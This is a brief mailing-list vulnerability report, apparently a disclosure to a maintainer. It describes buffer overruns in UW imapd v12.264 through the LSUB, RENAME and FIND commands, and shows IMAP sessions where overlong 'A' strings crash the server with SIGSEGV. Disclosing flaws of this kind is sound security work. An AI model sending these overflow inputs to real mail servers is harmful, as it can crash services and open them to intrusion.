Hi again,
imapd seems to be very weak. I've found another three buffer overruns.
This time affected commands are LSUB, RENAME and FIND:
* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)
SIGSEGV received.
* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)
SIGSEGV received.
* OK localhost IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)
SIGSEGV received.
It seems that all two-argument commands in authenticated state - where second
argument is string - are vulnerable. I'm not sure, but ipop2/3d works fine in
all states, also in transaction state. Mark, Am I right?
Regards,
Michal Szymanski [[EMAIL PROTECTED]];
